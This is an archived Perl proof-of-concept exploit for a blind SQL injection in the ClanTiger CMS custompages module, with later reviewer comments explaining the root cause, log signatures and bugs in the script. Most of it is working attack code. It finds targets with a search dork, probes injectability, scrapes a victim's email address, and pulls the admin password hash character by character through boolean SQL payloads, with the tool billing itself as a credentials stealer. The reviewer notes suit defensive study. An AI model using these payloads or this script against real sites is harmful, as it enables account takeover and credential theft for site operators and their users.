
clantiger-blindsql.txt

Posted on 18 April 2009

#!/usr/bin/perl # #------------------------------------------------- # (module custompage.php) BLIND SQL INJECTION #------------------------------------------------- # # CMS INFORMATION: # #-->WEB: http://www.clantiger.com #-->DOWNLOAD: http://www.clantiger.com/download-clan-cms #-->DEMO: http://www.demo.clantiger.com/ #-->CATEGORY: CMS / Portals #-->DESCRIPTION: ClanTiger is a content management system specifically designed for gaiming # clans... # # CMS VULNERABILITY: # #-->TESTED ON: firefox 2.0.0.20 and IE 7.0.5730 (Default) #-->DORK: "Powered by ClanTiger" #-->CATEGORY: BLIND SQL INJECTION/ PERL EXPLOIT #-->AFFECT VERSION: LAST = 1.1.1 (1.1 too) #-->Discovered Bug date: 2009-04-11 #-->Reported Bug date: 2009-04-11 #-->Fixed bug date: Not fixed #-->Info patch (????): Not fixed #-->Author: YEnH4ckEr #-->mail: y3nh4ck3r[at]gmail[dot]com #-->WEB/BLOG: N/A #-->COMMENT: A mi novia Marijose...hermano,cuñada, padres (y amigos xD) por su apoyo. # #-------------- #BUG FILE: #-------------- # #Path --> [HOME_PATH]/modules/custompages.php # #It contents: # # function main() # { # # ... # # $page = new CustomPage(); # $page->slug = $_GET['slug']; # $page->getBy(array('slug')); # # if(!$page->id) # { # throw new cccException('The page you are looking for is currently unavailable. You may need to STOP! Hammertime. If School Is Out, You should try reloading this page.','Page not found'); # } # # $tpl->define('title',$page->title); # $tpl->define('content',$page->content); // we allow HTML here, no safeoutput # # $this->pageDetails->setTitle($page->title); # $this->pageDetails->addKeyword($page->keywords); # $this->pageDetails->setDescription($page->description); # # $this->content = $tpl->publish(); # $this->display(); # } # #--------------- #CONDITIONS: #--------------- # #**DB_PREFIX="" (Default) # # maybe: db, db_clan, ... 
#
#**Exist a custompage
#
#**gpc_magic_quotes=off
#
#------------------------------------------
#PROOF OF CONCEPT (BLIND SQL INJECTION):
#------------------------------------------
#
#[HOME_PATH]/modules/custompages.php?slug=the_custom_page' [BLIND SQL INJECTION]
#
#-------------
#EXAMPLE:
#-------------
#
#[HOME_PATH]/modules/custompages.php?slug=the_custom_page'%20AND%20((SELECT%20length(username)%20from%20members%20WHERE%20id=1)=5)%20/*
#
#Result: admin's username has 5 characters (maybe = admin? :P)
#
#*******************************************************************
# GREETZ TO: Str0ke, JosS and all spanish Hack3Rs community!
#*******************************************************************
#
# ---------------------------------------------------------------------
# Reviewer notes (defensive reading of this proof of concept):
#
# * Root cause, per the custompages.php excerpt quoted in the header
#   above: $_GET['slug'] is copied into $page->slug and handed to
#   getBy() without escaping, so an injected quote reaches the SQL
#   query whenever magic_quotes_gpc is off.  The application-side fix
#   is to bind or escape the slug before it is used in a query;
#   magic_quotes is not a mitigation.
# * The script needs a valid user session (the CCC_UID / CCC_CODE
#   cookies passed on the command line), so what it demonstrates is an
#   *authenticated* blind SQL injection.
# * The oracle is boolean: a response whose <title> still contains the
#   custompage slug is read as "injected predicate true".  Every probe
#   is a GET to index.php?module=custompages&slug=<slug>'+AND+...+/*,
#   one request per candidate character.  For log review or WAF
#   tuning the observable pattern is a burst of requests from one
#   session whose slug value carries a quote, "AND", "ascii(substring("
#   and a trailing "/*", all with the fixed User-Agent set in request().
# * As rendered on this page the listing has lost its backslash escapes
#   (no "\n" in any print, an unbalanced "" inside helper(), an
#   unescaped "/" inside the </div> regexes), so it does not compile as
#   shown.  The code below is only re-indented; every non-comment token
#   is unchanged.
# * There is no "use strict"/"use warnings": $output, $email, $pass, $i,
#   $j, $idhack, $db_prefix, $mail, $passhash and $numArgs are package
#   globals shared between the subs and the main body.
# ---------------------------------------------------------------------

use LWP::UserAgent;
# HTTP::Request is used in request() without its own "use"; LWP::UserAgent
# normally loads it - confirm if this is ever run under a stricter setup.
use HTML::TreeBuilder 2.96;

#Subroutines

# Clear the console and, on Windows, set the window title and colour.
# $linux is "0" when $^O contains "win" (case-insensitive) and "1"
# otherwise.  The name is misleading: every non-Windows OS takes the
# "1" branch, while "cygwin" and "darwin" also contain "win" and are
# therefore treated as Windows.
sub lw {
    my $SO = $^O;
    my $linux = "";
    if (index(lc($SO),"win")!=-1){
        $linux="0";
    }else{
        $linux="1";
    }
    if($linux){
        system("clear");
    }
    else{
        system("cls");
        system ("title Clan Tiger CMS (module custompages.php) BLIND SQL Injection Exploit");
        system ("color 02");
    }
}

# Issue one GET to $_[2] carrying the session cookies and return the
# whole HTTP response (status line, headers and body) as a single string.
#   $_[0]  value of the CCC_UID cookie
#   $_[1]  value of the CCC_CODE cookie
#   $_[2]  absolute URL to fetch
# No status check is made: an error page is returned like any other and
# is matched textually by the callers.
sub request {
    my $cookie="CCC_LANG=en;"." CCC_UID=".$_[0]."; CCC_CODE=".$_[1].";";
    my $userag = LWP::UserAgent->new;
    # Fixed User-Agent string - a stable fingerprint for log review.
    $userag -> agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
    my $request = HTTP::Request -> new(GET => $_[2]);
    $request->header(cookie => $cookie);
    my $outcode= $userag->request($request)->as_string;
    return $outcode;
}

# Print the command-line usage.  Called when fewer than five positional
# arguments are given; the caller exits afterwards.
sub helper {
    print " [**] Clan Tiger CMS - BLIND SQL Injection Exploit ";
    print " [??] USAGE MODE: [??] ";
    print " [**] perl $0 [HOST] [PATH] [uid] [code] [slug] [id] [DB_PREFIX] ";
    print " [**] [HOST]: Web attacked. ";
    print " [**] [PATH]: Home Path. ";
    print " [**] [uid]: The CCC_UID cookie. ";
    print " [**] [code]: The CCC_CODE cookie. ";
    print " [**] [slug]: Title custompage. ";
    print " [**] [id]: Exploiting id user. Default: 1 (**optional) ";
    print " [**] [DB_PREFIX]: Global var needed. Default: null (**optional) ";
    print " [**] Example: perl $0 www.example.es Clan-tiger-111 f717716... 
";
    # The "" below is the rendering artefact mentioned in the header notes.
    print " [**] ...2e1a50db06c0f2fe8804885ac2c01390 namecustompage 1 "" ";
}

# Fetch the target user's profile page and return the text of the first
# <td style="width: 70%"> cell, which the author takes to be the e-mail
# address (the profile page layout is assumed, not verified here).
#   $_[0]  CCC_UID,  $_[1]  CCC_CODE,  $_[2]  profile URL
# Side effect: the raw response is stored in the global $output.
# If no such cell exists look_down() returns undef and ->as_text dies.
sub mail{
    $output=&request($_[0],$_[1],$_[2]);
    my $root = HTML::TreeBuilder->new_from_content($output); # parse the response body
    $email= $root->look_down('_tag','td','style','width: 70%');
    print " ----------------------------------------------------------------- ";
    print " Mail captured!.Getting password hash. Wait for a moment... ";
    print " ----------------------------------------------------------------- ";
    # as_text() is returned before the tree is freed: the delete() below
    # is unreachable, so the parsed tree is never explicitly released.
    return $email -> as_text();
    $root->delete();
}

# Recover the 32-character password hash of user $_[1] one character at
# a time through the boolean oracle.  Positional arguments:
#   $_[0]  DB_PREFIX,  $_[1]  user id,  $_[2]  CCC_UID,  $_[3]  CCC_CODE,
#   $_[4]  base URL of the custompage (slug already appended)
# $j is the 1-based character position (1..32) and $i the candidate
# ASCII code.  Candidates run 48..57 ('0'..'9'), then jump to 97 ('a')
# and continue up to 126, i.e. up to 40 requests per position.
# Returns the global $pass (possibly partial) or exits when nothing was
# found.  Uses the globals $output, $pass, $i, $j and $custompage.
sub password {
    #Second password...
    $j=1;
    $i=48;
    while(($j<=32) && ($i<=126)){
        # Probe: "character $j of the stored hash equals chr($i)?"
        my $finalrequest=$_[4]."'+AND+ascii(substring((SELECT+password+FROM+".$_[0]."members+WHERE+id=".$_[1]."),".$j.",1))=".$i."+/*";
        $output=&request($_[2],$_[3],$finalrequest);
        # NOTE(review): `/<title>/` here matches against $_, not $output,
        # and the `my $custompage` of the main body is declared after
        # this sub, so $custompage here is an unset package global.  The
        # effective pattern is therefore not the intended "<title>slug"
        # - confirm what this actually matches before trusting the result.
        if ( $output =~ (/<title>/.$custompage)) {
            $pass=$pass.chr($i);   # character found; move to the next position
            $j++;
            $i=47;                 # $i++ below restarts candidates at 48
        }
        if($i==57) {
            $i=96;                 # skip ':'..'`'; $i++ below resumes at 'a'
        }
        #new char
        $i++;
    }
    # The loop ends either because $i passed 126 (no candidate matched
    # for this position) or because $j passed 32 (all positions done).
    # NOTE(review): $i leaves the loop as 127, so `$i>127` is never true
    # and the failure message below is only reachable via $j>32 - which
    # implies $pass is non-empty.  An unmatched position therefore
    # returns a partial (or empty) hash silently.
    #Error
    if(($i>127) || ($j>32)){
        if(!$pass){
            print " ----------------------------------------------------------------- ";
            print(" EXPLOIT FAILED! ");
            print(" Fatal error: Datas doesn't find! ");
            print " ----------------------------------------------------------------- ";
            exit(1);
        }
    }
    return $pass;
}

#Main
&lw;
print " ######################################################### ";
print " ######################################################### ";
print " ## Clan Tiger CMS - BLIND SQL Injection Exploit ## ";
print " ## ++Conditions: Need a register user,a custompage ## ";
print " ## and DB_PREFIX (default:null) ## ";
print " ## Author: Y3nh4ck3r ## ";
print " ## Contact:y3nh4ck3r[at]gmail[dot]com ## ";
print " ## Proud to be Spanish! 
## ";
print " ######################################################### ";
print " ######################################################### ";

#Init variables
# Positional arguments are read before the argument count is checked, so
# with too few arguments these are simply undef until helper() runs.
my $host=$ARGV[0];
my $path=$ARGV[1];
my $uid=$ARGV[2];
my $code=$ARGV[3];
my $custompage=$ARGV[4];

#Build the uri
# Every probe below appends its SQL fragment to this URL, i.e. directly
# after the slug value.
my $finalhost="http://".$host."/".$path."/index.php?module=custompages&slug=";
$finalhost=$finalhost.$custompage;

#Check all variables needed
# At least five arguments are required (HOST PATH uid code slug).
$numArgs = $#ARGV + 1;
if($numArgs<=4) {
    &helper;
    exit(1);
}

#Id-user is optional.Default:1
# Note that a literal "0" for either optional argument is treated as
# absent here because the test is on truthiness, not on definedness.
if(!$ARGV[5]){
    $idhack="1";
}else{
    $idhack=$ARGV[5];
}
if(!$ARGV[6]){
    $db_prefix="";
}else{
    $db_prefix=$ARGV[6];
}

#Testing
# Baseline request without any injection: used to tell apart "session
# cookies rejected", "slug unknown" and "page rendered with our slug in
# the title", all by substring matching on the raw response.
my $finalrequest = $finalhost;
$output=&request($uid,$code,$finalrequest);
if ( $output =~ /<div class="title">Access denied</div>/) {
    print " ----------------------------------------------------------------- ";
    print " Your credentials are not correct! This exploits need login. ";
    print " Options: [your-id-user],[your-password] incorrect. ";
    print " Exploit failed! No luck! ";
    print " ----------------------------------------------------------------- ";
    exit(1);
}
if ( $output =~ /<div class="title">Page not found</div>/) {
    print " ----------------------------------------------------------------- ";
    print " Custom page doesn't exist! Maybe no there on this server! ";
    print " Option: [slug-get-var] incorrect. ";
    print " Exploit failed! No luck! ";
    print " ----------------------------------------------------------------- ";
    exit(1);
}
# Same `/<title>/.$custompage` construct as in password(): here
# $custompage is the lexical declared above, but `/<title>/` still
# matches against $_ rather than $output.
if ( $output =~ (/<title>/.$custompage)) {
    print " ----------------------------------------------------------------- ";
    print " This Web could be vulnerable! ";
    print " The custompage exists! ";
    print " Testing Blind SQL Injection... ";
    print " ----------------------------------------------------------------- ";
}else{
    print " ----------------------------------------------------------------- ";
    print " Custompage doesn't exist! ";
    print " EXPLOIT FAILED! 
";
    print " ----------------------------------------------------------------- ";
    exit(1);
}

#Test blind sql injection
# Always-true predicate: if the page still renders, the quote broke out
# of the query and the trailing /* swallowed the rest of it.
# (`my $finalrequest` is redeclared in this scope here and again below;
# "use warnings" would flag both.)
my $finalrequest=$finalhost."'+AND+1=1+/*";
$output=&request($uid,$code,$finalrequest);
if ( $output =~ (/<title>/.$custompage)) {
    print " ----------------------------------------------------------------- ";
    print " This Web is really vulnerable! ";
    print " Tested Blind SQL Injection. ";
    print " Checking id user and DB_PREFIX null... ";
    print " ----------------------------------------------------------------- ";
}else{
    print " ----------------------------------------------------------------- ";
    print " This Web is not vulnerable (Maybe patched)! ";
    print " EXPLOIT FAILED! ";
    print " ----------------------------------------------------------------- ";
    exit(1);
}

#Test if user exists and DB_PREFIX
# A sub-select against <prefix>members doubles as a check that the table
# prefix is right: a wrong prefix makes the query fail and the page is
# not rendered.
my $finalrequest=$finalhost."'+AND+(SELECT+COUNT(*)+from+".$db_prefix."members+WHERE+id=".$idhack.")+/*";
$output=&request($uid,$code,$finalrequest);
if ( $output =~ (/<title>/.$custompage)) {
    print " ----------------------------------------------------------------- ";
    print " OK...The user exists and DB_PREFIX is '".$db_prefix."'! ";
    print " Starting exploit... ";
    print " ----------------------------------------------------------------- ";
    print " Wait several minutes... ";
    print " ----------------------------------------------------------------- ";
}else{
    print " ----------------------------------------------------------------- ";
    print " User doesn't exists or DB_PREFIX not '".$db_prefix."' ";
    print " EXPLOIT FAILED! ";
    print " ----------------------------------------------------------------- ";
    exit(1);
}

#OK, now we get the user's e-mail from the web profile page.
#(The author notes this is faster than extracting it through the injection.)
#First email...
my $hostmail="http://".$host."/".$path."/index.php?module=profiles&action=view&id=".$idhack;
$mail=&mail($uid,$code,$hostmail);
# Then the password hash, character by character, through the oracle.
$passhash=&password($db_prefix,$idhack,$uid,$code,$finalhost);
print " ************************************************* ";
print " **** EXPLOIT EXECUTED (CREDENTIALS STEALER) **** ";
print " ************************************************* ";
print " User-id:".$idhack." ";
print " User-email:".$mail." ";
print " User-password(hash):".$passhash." ";
print " ----------------------FINISH!-------------------- ";
print " ---------------Thanks to: y3hn4ck3r-------------- ";
print " ------------------------EOF---------------------- ";
# Exits non-zero even on success, so the exit status cannot be used to
# tell a completed run from a failed one.
exit(1);
#Ok...all job done

 

